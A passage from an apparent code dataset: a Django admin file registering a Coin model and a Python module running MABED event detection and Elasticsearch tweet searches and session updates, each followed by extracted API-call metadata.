9608), False, 'import random\n'), ((9997, 10016), 'math.ceil', 'math.ceil', (['coord[0]'], {}), '(coord[0])\n', (10006, 10016), False, 'import math\n'), ((10018, 10037), 'math.ceil', 'math.ceil', (['coord[1]'], {}), '(coord[1])\n', (10027, 10037), False, 'import math\n'), ((1932, 1956), 'random.randint', 'random.randint', (['(1)', 'width'], {}), '(1, width)\n', (1946, 1956), False, 'import random\n'), ((8119, 8139), 'random.randint', 'random.randint', (['(0)', '(1)'], {}), '(0, 1)\n', (8133, 8139), False, 'import random\n'), ((9877, 9892), 'random.random', 'random.random', ([], {}), '()\n', (9890, 9892), False, 'import random\n'), ((9922, 9937), 'random.random', 'random.random', ([], {}), '()\n', (9935, 9937), False, 'import random\n'), ((10095, 10114), 'math.ceil', 'math.ceil', (['coord[0]'], {}), '(coord[0])\n', (10104, 10114), False, 'import math\n'), ((10116, 10136), 'math.floor', 'math.floor', (['coord[1]'], {}), '(coord[1])\n', (10126, 10136), False, 'import math\n'), ((6343, 6395), 'math.sqrt', 'math.sqrt', (['((x - coord[0]) ** 2 + (y - coord[1]) ** 2)'], {}), '((x - coord[0]) ** 2 + (y - coord[1]) ** 2)\n', (6352, 6395), False, 'import math\n'), ((10194, 10214), 'math.floor', 'math.floor', (['coord[0]'], {}), '(coord[0])\n', (10204, 10214), False, 'import math\n'), ((10216, 10235), 'math.ceil', 'math.ceil', (['coord[1]'], {}), '(coord[1])\n', (10225, 10235), False, 'import math\n'), ((10271, 10291), 'math.floor', 'math.floor', (['coord[0]'], {}), '(coord[0])\n', (10281, 10291), False, 'import math\n'), ((10293, 10313), 'math.floor', 'math.floor', (['coord[1]'], {}), '(coord[1])\n', (10303, 10313), False, 'import math\n'), ((8458, 8482), 'networkx.topological_sort', 'nx.topological_sort', (['dag'], {}), '(dag)\n', (8477, 8482), True, 'import networkx as nx\n')]
|
from django.contrib import admin
# Register your models here.
from .models import Coin
admin.site.register(Coin)
|
[
"django.contrib.admin.site.register"
] |
[((89, 114), 'django.contrib.admin.site.register', 'admin.site.register', (['Coin'], {}), '(Coin)\n', (108, 114), False, 'from django.contrib import admin\n')]
|
# coding: utf-8
import timeit
import json
import time
from flask import jsonify
from mabed.es_corpus import Corpus
from mabed.mabed import MABED
from mabed.es_connector import Es_connector
from gensim.models.doc2vec import Doc2Vec, TaggedDocument
from nltk.tokenize import word_tokenize
__author__ = "<NAME>"
__email__ = "<EMAIL>"
# Interface Functions
class Functions:
def __init__(self):
self.sessions_index = 'mabed_sessions'
self.sessions_doc_type = 'session'
# print("Functions init")
# ==================================================================
# Event Detection
# ==================================================================
def detect_events(self, index="test3", k=10, maf=10, mrf=0.4, tsl=30, p=10, theta=0.6, sigma=0.6, cluster=2):
sw = 'stopwords/twitter_all.txt'
sep = '\t'
print('Parameters:')
print(
' Index: %s\n k: %d\n Stop-words: %s\n Min. abs. word frequency: %d\n Max. rel. word frequency: %f' %
(index, k, sw, maf, mrf))
print(' p: %d\n theta: %f\n sigma: %f' % (p, theta, sigma))
print('Loading corpus...')
start_time = timeit.default_timer()
my_corpus = Corpus(sw, maf, mrf, sep, index=index)
elapsed = timeit.default_timer() - start_time
print('Corpus loaded in %f seconds.' % elapsed)
time_slice_length = tsl
print('Partitioning tweets into %d-minute time-slices...' % time_slice_length)
start_time = timeit.default_timer()
my_corpus.discretize(time_slice_length, cluster)
elapsed = timeit.default_timer() - start_time
print('Partitioning done in %f seconds.' % elapsed)
print('Running MABED...')
start_time = timeit.default_timer()
mabed = MABED(my_corpus)
mabed.run(k=k, p=p, theta=theta, sigma=sigma)
elapsed = timeit.default_timer() - start_time
print('Event detection performed in %f seconds.' % elapsed)
return mabed
def event_descriptions(self, index="test3", k=10, maf=10, mrf=0.4, tsl=30, p=10, theta=0.6, sigma=0.6, cluster=2):
mabed = self.detect_events(index, k, maf, mrf, tsl, p, theta, sigma, cluster)
# format data
event_descriptions = []
impact_data = []
formatted_dates = []
for i in range(0, mabed.corpus.time_slice_count):
formatted_dates.append(int(time.mktime(mabed.corpus.to_date(i).timetuple())) * 1000)
for event in mabed.events:
mag = event[0]
main_term = event[2]
raw_anomaly = event[4]
formatted_anomaly = []
time_interval = event[1]
related_terms = []
for related_term in event[3]:
# related_terms.append(related_term[0] + ' (' + str("{0:.2f}".format(related_term[1])) + ')')
related_terms.append({'word':related_term[0], 'value':str("{0:.2f}".format(related_term[1])) })
event_descriptions.append((mag,
str(mabed.corpus.to_date(time_interval[0])),
str(mabed.corpus.to_date(time_interval[1])),
main_term,
json.dumps(related_terms)))
for i in range(0, mabed.corpus.time_slice_count):
value = 0
if time_interval[0] <= i <= time_interval[1]:
value = raw_anomaly[i]
if value < 0:
value = 0
formatted_anomaly.append([ formatted_dates[i],value])
impact_data.append({"key": main_term, "values": formatted_anomaly})
return {"event_descriptions": event_descriptions, "impact_data": impact_data}
def detect_filtered_events(self, index="test3", k=10, maf=10, mrf=0.4, tsl=30, p=10, theta=0.6, sigma=0.6, session=False, filter=False, cluster=2):
sw = 'stopwords/twitter_all.txt'
sep = '\t'
print('Parameters:')
print(
' Index: %s\n k: %d\n Stop-words: %s\n Min. abs. word frequency: %d\n Max. rel. word frequency: %f' %
(index, k, sw, maf, mrf))
print(' p: %d\n theta: %f\n sigma: %f' % (p, theta, sigma))
print('Loading corpus...')
start_time = timeit.default_timer()
my_corpus = Corpus(sw, maf, mrf, sep, index=index, session=session, filter=filter)
if not my_corpus.tweets:
return False
elapsed = timeit.default_timer() - start_time
print('Corpus loaded in %f seconds.' % elapsed)
time_slice_length = tsl
print('Partitioning tweets into %d-minute time-slices...' % time_slice_length)
start_time = timeit.default_timer()
my_corpus.discretize(time_slice_length, cluster)
elapsed = timeit.default_timer() - start_time
print('Partitioning done in %f seconds.' % elapsed)
print('Running MABED...')
start_time = timeit.default_timer()
mabed = MABED(my_corpus)
mabed.run(k=k, p=p, theta=theta, sigma=sigma)
elapsed = timeit.default_timer() - start_time
print('Event detection performed in %f seconds.' % elapsed)
return mabed
def filtered_event_descriptions(self, index="test3", k=10, maf=10, mrf=0.4, tsl=30, p=10, theta=0.6, sigma=0.6, session=False, filter=False, cluster=2):
mabed = self.detect_filtered_events(index, k, maf, mrf, tsl, p, theta, sigma, session, filter, cluster)
if not mabed:
return False
# format data
event_descriptions = []
impact_data = []
formatted_dates = []
for i in range(0, mabed.corpus.time_slice_count):
formatted_dates.append(int(time.mktime(mabed.corpus.to_date(i).timetuple())) * 1000)
for event in mabed.events:
mag = event[0]
main_term = event[2]
raw_anomaly = event[4]
formatted_anomaly = []
time_interval = event[1]
related_terms = []
for related_term in event[3]:
# related_terms.append(related_term[0] + ' (' + str("{0:.2f}".format(related_term[1])) + ')')
related_terms.append({'word':related_term[0], 'value':str("{0:.2f}".format(related_term[1])) })
event_descriptions.append((mag,
str(mabed.corpus.to_date(time_interval[0])),
str(mabed.corpus.to_date(time_interval[1])),
main_term,
json.dumps(related_terms)))
for i in range(0, mabed.corpus.time_slice_count):
value = 0
if time_interval[0] <= i <= time_interval[1]:
value = raw_anomaly[i]
if value < 0:
value = 0
formatted_anomaly.append([ formatted_dates[i],value])
impact_data.append({"key": main_term, "values": formatted_anomaly})
return {"event_descriptions": event_descriptions, "impact_data": impact_data}
# ==================================================================
# Tweets
# ==================================================================
def get_tweets(self, index="test3", word=""):
my_connector = Es_connector(index=index)
# res = my_connector.search({
# "query": {
# "simple_query_string": {
# "fields": [
# "text"
# ],
# "query": word
# }
# }
# })
# res = my_connector.bigSearch(
# {
# "_source": ["text", "id_str", "extended_entities", "user", "created_at", "link"],
# "query": {
# "simple_query_string": {
# "fields": [
# "text"
# ],
# "query": word
# }
# }
# })
res = my_connector.init_paginatedSearch({
"query": {
"simple_query_string": {
"fields": [
"text"
],
"query": word
}
}
})
return res
def get_tweets_scroll(self, index, sid, scroll_size):
my_connector = Es_connector(index=index)
res = my_connector.loop_paginatedSearch(sid, scroll_size)
return res
def get_big_tweets(self, index="test3", word=""):
my_connector = Es_connector(index=index)
res = my_connector.bigSearch(
{
"_source": ["text", "id_str", "extended_entities", "user", "created_at", "link"],
"query": {
"simple_query_string": {
"fields": [
"text"
],
"query": word
}
}
})
return res
def get_tweets_state(self, index="test3", session="",state="proposed"):
my_connector = Es_connector(index=index)
res = my_connector.init_paginatedSearch(
{
"query": {
"term": {
"session_"+session: state
}
}
})
return res
def get_tweets_query_state(self, index="test3", word="", state="proposed", session=""):
my_connector = Es_connector(index=index)
query = {
"query": {
"bool": {
"must": {
"simple_query_string": {
"fields": [
"text"
],
"query": word
}
},
"filter": {
"bool": {
"should": [
{
"match": {
session: state
}
}
]
}
}
}
}
}
res = my_connector.init_paginatedSearch(query)
return res
def get_big_tweets_scroll(self, index="test3", word=""):
my_connector = Es_connector(index=index)
res = my_connector.init_paginatedSearch(
{
"_source": ["text", "id_str", "extended_entities", "user", "created_at", "link"],
"query": {
"simple_query_string": {
"fields": [
"text"
],
"query": word
}
}
})
return res
def get_event_tweets(self, index="test3", main_term="", related_terms=""):
my_connector = Es_connector(index=index)
terms = []
words = main_term + ' '
for t in related_terms:
terms.append({ "match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word']+ " "
terms.append({"match": {
"text": {
"query": main_term,
"boost": 2
}
}})
# res = my_connector.search({"query": {"term" : { "text" : word }}})
# query = {
# "bool": {
# "must": {
# "match": {
# "text": {
# "query": main_term,
# "operator": "or"
# }
# }
# },
# "should": terms
# }
# }
query = {
"sort": [
"_score"
],
"query": {
"bool": {
"should": terms
}
}
}
# print(query)
# res = my_connector.search(query)
res = my_connector.init_paginatedSearch(query)
return res
def get_event_filter_tweets(self, index="test3", main_term="", related_terms="", state = "proposed", session=""):
my_connector = Es_connector(index=index)
terms = []
words = main_term + ' '
for t in related_terms:
terms.append({ "match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word']+ " "
terms.append({"match": {
"text": {
"query": main_term,
"boost": 2
}
}})
# query = {
# "sort": [
# "_score"
# ],
# "query": {
# "bool": {
# "should": terms
# }
# }
# }
query = {
"sort": [
"_score"
],
"query": {
"bool": {
"must": [
{
"bool": {
"should": terms
}
}
],
"filter": {
"bool": {
"should": [
{
"match": {
session: state
}
}
]
}
}
}
}
}
res = my_connector.init_paginatedSearch(query)
return res
def get_event_tweets2(self, index="test3", main_term="", related_terms="", cid =0):
my_connector = Es_connector(index=index)
terms = []
words = main_term + ' '
for t in related_terms:
terms.append({ "match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word']+ " "
terms.append({"match": {
"text": {
"query": main_term,
"boost": 2
}
}})
# terms.append({"match": {
# "imagesCluster": {
# "query": cid
# }
# }})
# query = {
# "query": {
# "bool": {
# "must": {
# "exists": {
# "field": "imagesCluster"
# }
# },
# # "must": { "match": { "imagesCluster" : cid }},
# "should": terms
# }
# }
# }
query = {
"sort": [
"_score"
],
"query": {
"bool": {
"should": terms,
"minimum_should_match": 1,
"must": [
{
"match": {
"imagesCluster": cid
}
}
]
}
}
}
# res = my_connector.bigSearch(query)
res = my_connector.init_paginatedSearch(query)
return res
def get_cluster_tweets(self, index="test3", cid=0):
my_connector = Es_connector(index=index)
query = {
# "_source": [
# "id_str",
# "imagesCluster",
# "session_Twitter2015",
# "extended_entities"
# ],
"query": {
"term" : { "imagesCluster": cid }
}
}
res = my_connector.search(query)
return res
def get_event_image(self, index="test3", main_term="", related_terms=""):
my_connector = Es_connector(index=index)
terms = []
words = main_term + ' '
for t in related_terms:
terms.append({ "match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word']+ " "
terms.append({"match": {
"text": {
"query": main_term,
"boost": 2
}
}})
# res = my_connector.search({"query": {"term" : { "text" : word }}})
# query = {
# "bool": {
# "must": {
# "match": {
# "text": {
# "query": main_term,
# "operator": "or"
# }
# }
# },
# "should": terms
# }
# }
query = {
"size": 1,
"_source": [
"id_str",
"imagesCluster",
"session_Twitter2015",
"extended_entities"
],
"query": {
"bool": {
"must":
{
"exists": {
"field": "extended_entities"
}
},
"should": terms
}
}
}
# print(query)
res = my_connector.search(query)
return res
def get_valid_tweets(self, index="test3"):
my_connector = Es_connector(index=index)
res = my_connector.search({
"query": {
"simple_query_string": {
"fields": [
"text"
],
"query": word
}
}
})
# res = my_connector.bigSearch(
# {
# "_source": ["text", "id_str", "extended_entities", "user", "created_at", "link"],
# "query": {
# "simple_query_string": {
# "fields": [
# "text"
# ],
# "query": word
# }
# }
# })
return res['hits']['hits']
# ==================================================================
# Clusters
# ==================================================================
def get_clusters(self, index="test3", word=""):
my_connector = Es_connector(index=index)
res = my_connector.search({
"size": 1,
"query": {
"simple_query_string": {
"fields": [
"text"
],
"query": word
}
},
"aggs": {
"group_by_cluster": {
"terms": {
"field": "imagesCluster",
"size": 9999
}
}
}
})
# print("Clusters")
# print(res['aggregations']['group_by_cluster']['buckets'])
clusters = res['aggregations']['group_by_cluster']['buckets']
with open(index+'.json') as f:
data = json.load(f)
for cluster in clusters:
# print(cluster['key'])
images = data['duplicates'][cluster['key']]
# print(images[0])
cluster['image']=images[0]
cluster['size'] = len(images)
# print(clusters)
return clusters
def get_event_clusters(self, index="test3", main_term="", related_terms=""):
my_connector = Es_connector(index=index)
terms = []
words = main_term + ' '
for t in related_terms:
terms.append({ "match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word']+ " "
terms.append({"match": {
"text": {
"query": main_term,
"boost": 2
}
}})
# query = {
# "size": 0,
# "query": {
# "bool": {
# "should": terms
# }
# },
# "aggs": {
# "group_by_cluster": {
# "terms": {
# "field": "imagesCluster",
# "size": 200
# }
# }
# }
# }
query = {
"size": 0,
"query": {
"bool": {
"should": terms
}
},
"aggregations": {
"group_by_cluster": {
"terms": {
"field": "imagesCluster",
# "shard_size": 999999999,
"size": 999999
}
}
}
}
# print(query)
res = my_connector.search(query)
# print("Clusters")
# print(res['aggregations']['group_by_cluster']['buckets'])
clusters = res['aggregations']['group_by_cluster']['buckets']
with open(index + '.json') as f:
data = json.load(f)
for cluster in clusters:
# q1 = {
# "_source": [
# "text",
# "imagesCluster"
# ],
# "query": {
# "bool": {
# "should": terms,
# "filter": {
# "bool": {
# "should": [
# {
# "match": {
# "imagesCluster": cluster['key']
# }
# }
# ]
# }
# }
# }
# }
# }
q2 = {
"query": {
"term": {"imagesCluster": cluster['key']}
}
}
# cres1 = my_connector.search(q1)
cres = my_connector.count(q2)
# print(cluster['key'])
images = data['duplicates'][cluster['key']]
# print(images[0])
cluster['image'] = images[0]
# cluster['size'] = len(images)
# print(cres)
cluster['size'] = cres['count']
# cluster['size2'] = cres1['hits']['total']
# if cluster['key']==1452:
# print(cluster)
# print(clusters)
return clusters
# ==================================================================
# Sessions
# ==================================================================
# Get all sessions
def get_sessions(self):
my_connector = Es_connector(index=self.sessions_index, doc_type=self.sessions_doc_type)
query = {
"query": {
"match_all": {}
}
}
res = my_connector.search(query)
return res
# Get session by session ID
def get_session(self, id):
my_connector = Es_connector(index=self.sessions_index, doc_type=self.sessions_doc_type)
res = my_connector.get(id)
return res
# Get session by session name
def get_session_by_Name(self, name):
my_connector = Es_connector(index=self.sessions_index, doc_type=self.sessions_doc_type)
query = {
"query": {
"constant_score" : {
"filter" : {
"term" : {
"s_name" : name
}
}
}
}
}
res = my_connector.search(query)
return res
# Add new session
def add_session(self, name, index):
my_connector = Es_connector(index=self.sessions_index, doc_type=self.sessions_doc_type)
session = self.get_session_by_Name(name)
if session['hits']['total']==0:
res = my_connector.post({
"s_name": name,
"s_index": index,
"s_type": "tweet"
})
tweets_connector = Es_connector(index=index, doc_type="tweet")
tweets_connector.update_all('session_'+name, 'proposed')
return res
else:
return False
# Update specific field value in an Index
def update_all(self, index, doc_type, field, value):
my_connector = Es_connector(index=index, doc_type=doc_type)
res = my_connector.update_all(field, value)
return res
# Update session events results
def update_session_results(self, id, events, impact_data):
my_connector = Es_connector(index=self.sessions_index, doc_type=self.sessions_doc_type)
res = my_connector.update(id, {
"doc" : {
"events" : events,
"impact_data": impact_data
}
})
return res
# Get session events results
def get_session_results(self, id):
my_connector = Es_connector(index=self.sessions_index, doc_type=self.sessions_doc_type)
res = my_connector.get(id)
return res
# Delete session by name
def delete_session(self, id):
session_connector = Es_connector(index=self.sessions_index, doc_type=self.sessions_doc_type)
session = session_connector.get(id)
if session:
print("delete Session")
# print(session)
# 1. Delete session data from the tweets
tweets_connector = Es_connector(index=session['_source']['s_index'], doc_type=session['_source']['s_type'])
session_name = 'session_'+session['_source']['s_name']
print(session_name)
tweets_connector.remove_field_all(session_name)
# 2. Delete the session
session_connector.delete(id)
return True
else:
return False
# ==================================================================
# Tweets session status
# ==================================================================
# Set tweets status
def set_all_status(self, index, session, status):
tweets_connector = Es_connector(index=index, doc_type="tweet")
res = tweets_connector.update_all(session, status)
return res
def set_status(self, index, session, data):
tweets_connector = Es_connector(index=index, doc_type="tweet")
# All tweets
session = 'session_'+session
event = json.loads(data['event'])
# print("------------------------")
# print(data)
# print("------------------------")
# print(event)
# print(event['main_term'])
terms = []
words = event['main_term'] + ' '
for t in event['related_terms']:
terms.append({"match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word'] + " "
terms.append({"match": {
"text": {
"query": event['main_term'],
"boost": 2
}
}})
# query = {
# "query": {
# "bool": {
# "should": terms
# }
# }
# }
query = {
"query": {
"bool": {
"must": [
{
"bool": {
"should": terms
}
}
],
"filter": {
"bool": {
"should": [
{
"match": {
session: "proposed"
}
}
]
}
}
}
}
}
# print(query)
res = tweets_connector.update_query(query, session, data['status'])
# Event related
return res
def set_search_status(self, index, session, state, word):
tweets_connector = Es_connector(index=index, doc_type="tweet")
session = 'session_'+session
query = {
"query": {
"bool": {
"must": {
"simple_query_string": {
"fields": [
"text"
],
"query": word
}
},
"filter": {
"bool": {
"should": [
{
"match": {
session: "proposed"
}
}
]
}
}
}
}
}
res = tweets_connector.update_query(query, session, state)
return res
def set_search_status_force(self, index, session, state, word):
tweets_connector = Es_connector(index=index, doc_type="tweet")
session = 'session_'+session
query = {
"query": {
"bool": {
"must": {
"simple_query_string": {
"fields": [
"text"
],
"query": word
}
}
}
}
}
res = tweets_connector.update_query(query, session, state)
return res
def set_cluster_state(self, index, session, cid, state):
tweets_connector = Es_connector(index=index, doc_type="tweet")
# All tweets
session = 'session_'+session
query = {
"query": {
"term" : { "imagesCluster": cid }
}
}
res = tweets_connector.update_query(query, session, state)
return res
def set_tweet_state(self, index, session, tid, val):
tweets_connector = Es_connector(index=index, doc_type="tweet")
session = 'session_'+session
query = {
"doc" : {
session : val
}
}
res = tweets_connector.update(tid, query)
return res
def export_event(self, index, session):
my_connector = Es_connector(index=index)
res = my_connector.bigSearch(
{
"_source": {
"excludes": ["session_*"]
},
"query": {
"term": {
"session_"+session: "confirmed"
}
}
})
return res
# ==================================================================
# Beta
# ==================================================================
def get_event_tweets_count(self, index="test3", main_term="", related_terms=""):
my_connector = Es_connector(index=index)
terms = []
words = main_term + ' '
for t in related_terms:
terms.append({ "match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word']+ " "
terms.append({"match": {
"text": {
"query": main_term,
"boost": 2
}
}})
query = {
"query": {
"bool": {
"should": terms
}
}
}
res = my_connector.count(query)
return res['count']
def get_event_state_tweets_count(self, index="test3", session="", words="", state="confirmed"):
my_connector = Es_connector(index=index)
query = {
"query": {
"bool": {
"must": [
{
"match": {
"text": {
"query": words
}
}
}
],
"filter": {
"bool": {
"should": [
{
"match": {
"session_"+session: state
}
}
]
}
}
}
}
}
res = my_connector.count(query)
return res['count']
def get_words_tweets_count(self, index="test3", session="", words=""):
my_connector = Es_connector(index=index)
query = {
"query": {
"bool": {
"must": [
{
"match": {
"text": {
"query": words
}
}
}
]
}
}
}
res = my_connector.count(query)
return res['count']
def get_all_count(self, index="test3"):
my_connector = Es_connector(index=index)
query = {
"query": {
"match_all": {}
}
}
res = my_connector.count(query)
return res['count']
def get_words_count(self, index="test3", words=""):
my_connector = Es_connector(index=index)
query = {
"query": {
"simple_query_string": {
"fields": [
"text"
],
"query": words
}
}
}
res = my_connector.count(query)
return res['count']
def get_start_date(self, index):
my_connector = Es_connector(index=index)
res = my_connector.search_size({
"_source": [
"@timestamp",
"timestamp_ms"
],
"query": {
"match_all": {}
},
"sort": [
{
"@timestamp": {
"order": "asc"
}
}
]
},1)
return res['hits']['hits'][0]['_source']
def get_end_date(self, index):
my_connector = Es_connector(index=index)
res = my_connector.search_size({
"_source": [
"@timestamp",
"timestamp_ms"
],
"query": {
"match_all": {}
},
"sort": [
{
"@timestamp": {
"order": "desc"
}
}
]
},1)
return res['hits']['hits'][0]['_source']
def get_range_count(self, index, start, end):
my_connector = Es_connector(index=index)
query = {
"query": {
"range": {
"timestamp_ms": {
"gt": str(start),
"lt": str(end)
}
}
}
}
print(query)
res = my_connector.count(query)
return res['count']
def process_range_tweets(self, index, start, end, words,count):
sw = 'stopwords/twitter_all.txt'
my_connector = Es_connector(index=index)
res = my_connector.range_tweets(start, end, sw, words,count)
return res
def process_w2v_tweets(self, index, words,count):
sw = 'stopwords/twitter_all.txt'
my_connector = Es_connector(index=index)
res = my_connector.w2v_tweets(sw, words,count)
return res
def get_event_central_tweets(self, index="test3", main_term="", related_terms=""):
my_connector = Es_connector(index=index)
terms = []
words = main_term + ' '
for t in related_terms:
terms.append({ "match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word']+ " "
terms.append({"match": {
"text": {
"query": main_term,
"boost": 2
}
}})
query = {
"sort": [
"_score"
],
"query": {
"bool": {
"should": terms
}
}
}
res = my_connector.search_size(query,1)
return res
def get_event_tweets_bigsearch(self, index="test3", main_term="", related_terms=""):
my_connector = Es_connector(index=index)
terms = []
words = main_term + ' '
for t in related_terms:
terms.append({ "match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word']+ " "
terms.append({"match": {
"text": {
"query": main_term,
"boost": 2
}
}})
query = {
"sort": [
"_score"
],
"query": {
"bool": {
"should": terms
}
}
}
res = my_connector.bigTweetTextSearch(query)
return res
def getMean(self, index="test3", main_term="", related_terms=""):
my_connector = Es_connector(index=index)
terms = []
words = main_term + ' '
for t in related_terms:
terms.append({"match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word'] + " "
terms.append({"match": {
"text": {
"query": main_term,
"boost": 2
}
}})
query = {
"sort": [
"_score"
],
"_source": [
"_score"
],
"query": {
"bool": {
"should": terms
}
}
}
query = {
"size": 0,
"query": {
"bool": {
"should": terms
}
},
"aggs": {
"sum_scores": {
"sum": {
"script": "_score"
}
}
}
}
res = my_connector.search(query)
total = res['hits']['total']
sum = res['aggregations']['sum_scores']['value']
mean = sum / total
# res = my_connector.bigSearchMean(query)
return mean
def getSSE(self, index="test3", main_term="", related_terms="", mean=0):
my_connector = Es_connector(index=index)
terms = []
words = main_term + ' '
for t in related_terms:
terms.append({"match": {
"text": {
"query": t['word'],
"boost": t['value']
}
}})
words += t['word'] + " "
terms.append({"match": {
"text": {
"query": main_term,
"boost": 2
}
}})
query = {
"sort": [
"_score"
],
"query": {
"bool": {
"should": terms
}
}
}
res = my_connector.bigSearchSSE(query, mean)
return res
def d2v(self, tweet, data):
# data = ["I love machine learning. Its awesome.",
# "I love coding in python",
# "I love building chatbots python",
# "they chat amagingly well",
# "So we have saved the model and its ready for implementation. Lets play with it"]
print("=============================================================")
print("=============================================================")
print(tweet)
print("-------------")
print("-------------")
tagged_data = [TaggedDocument(words=word_tokenize(_d.lower()), tags=[str(i)]) for i, _d in enumerate(data)]
max_epochs = 100
vec_size = 20
alpha = 0.025
model = Doc2Vec(vector_size=vec_size,
alpha=alpha,
min_alpha=0.00025,
min_count=1,
dm=1)
model.build_vocab(tagged_data)
for epoch in range(max_epochs):
# print('iteration {0}'.format(epoch))
model.train(tagged_data,
total_examples=model.corpus_count,
epochs=model.iter)
# decrease the learning rate
model.alpha -= 0.0002
# fix the learning rate, no decay
model.min_alpha = model.alpha
# test_data = word_tokenize("So we have saved the model and its ready for implementation. Lets play with it".lower())
test_data = word_tokenize(tweet.lower())
v1 = model.infer_vector(test_data)
# print("V1_infer", v1)
# to find most similar doc using tags
similar_doc = model.docvecs.most_similar([v1])
print("similar_docs:")
print("-------------")
# print(similar_doc)
for doc in similar_doc:
print(data[int(doc[0])])
# print(doc[1])
print("=============================================================")
print("=============================================================")
# to find vector of doc in training data using tags or in other words, printing the vector of document at index 1 in training data
# print(model.docvecs['1'])
|
[
"json.load",
"mabed.es_corpus.Corpus",
"json.loads",
"timeit.default_timer",
"json.dumps",
"gensim.models.doc2vec.Doc2Vec",
"mabed.es_connector.Es_connector",
"mabed.mabed.MABED"
] |
[((1204, 1226), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (1224, 1226), False, 'import timeit\n'), ((1247, 1285), 'mabed.es_corpus.Corpus', 'Corpus', (['sw', 'maf', 'mrf', 'sep'], {'index': 'index'}), '(sw, maf, mrf, sep, index=index)\n', (1253, 1285), False, 'from mabed.es_corpus import Corpus\n'), ((1537, 1559), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (1557, 1559), False, 'import timeit\n'), ((1787, 1809), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (1807, 1809), False, 'import timeit\n'), ((1826, 1842), 'mabed.mabed.MABED', 'MABED', (['my_corpus'], {}), '(my_corpus)\n', (1831, 1842), False, 'from mabed.mabed import MABED\n'), ((4387, 4409), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (4407, 4409), False, 'import timeit\n'), ((4430, 4500), 'mabed.es_corpus.Corpus', 'Corpus', (['sw', 'maf', 'mrf', 'sep'], {'index': 'index', 'session': 'session', 'filter': 'filter'}), '(sw, maf, mrf, sep, index=index, session=session, filter=filter)\n', (4436, 4500), False, 'from mabed.es_corpus import Corpus\n'), ((4811, 4833), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (4831, 4833), False, 'import timeit\n'), ((5061, 5083), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (5081, 5083), False, 'import timeit\n'), ((5100, 5116), 'mabed.mabed.MABED', 'MABED', (['my_corpus'], {}), '(my_corpus)\n', (5105, 5116), False, 'from mabed.mabed import MABED\n'), ((7454, 7479), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (7466, 7479), False, 'from mabed.es_connector import Es_connector\n'), ((8605, 8630), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (8617, 8630), False, 'from mabed.es_connector import Es_connector\n'), ((8794, 8819), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (8806, 8819), False, 'from mabed.es_connector import Es_connector\n'), ((9345, 9370), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (9357, 9370), False, 'from mabed.es_connector import Es_connector\n'), ((9731, 9756), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (9743, 9756), False, 'from mabed.es_connector import Es_connector\n'), ((10595, 10620), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (10607, 10620), False, 'from mabed.es_connector import Es_connector\n'), ((11160, 11185), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (11172, 11185), False, 'from mabed.es_connector import Es_connector\n'), ((12631, 12656), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (12643, 12656), False, 'from mabed.es_connector import Es_connector\n'), ((14265, 14290), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (14277, 14290), False, 'from mabed.es_connector import Es_connector\n'), ((16065, 16090), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (16077, 16090), False, 'from mabed.es_connector import Es_connector\n'), ((16607, 16632), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (16619, 16632), False, 'from mabed.es_connector import Es_connector\n'), ((18392, 18417), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (18404, 18417), False, 'from mabed.es_connector import Es_connector\n'), ((19416, 19441), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (19428, 19441), False, 'from mabed.es_connector import Es_connector\n'), ((20510, 20535), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'index'}), '(index=index)\n', (20522, 20535), False, 'from mabed.es_connector import Es_connector\n'), ((23885, 23957), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'self.sessions_index', 'doc_type': 'self.sessions_doc_type'}), '(index=self.sessions_index, doc_type=self.sessions_doc_type)\n', (23897, 23957), False, 'from mabed.es_connector import Es_connector\n'), ((24226, 24298), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'self.sessions_index', 'doc_type': 'self.sessions_doc_type'}), '(index=self.sessions_index, doc_type=self.sessions_doc_type)\n', (24238, 24298), False, 'from mabed.es_connector import Es_connector\n'), ((24452, 24524), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'self.sessions_index', 'doc_type': 'self.sessions_doc_type'}), '(index=self.sessions_index, doc_type=self.sessions_doc_type)\n', (24464, 24524), False, 'from mabed.es_connector import Es_connector\n'), ((25028, 25100), 'mabed.es_connector.Es_connector', 'Es_connector', ([], {'index': 'self.sessions_index', 'doc_type': 'self.sessions_doc_type'}), '(index=self.sessions_index, 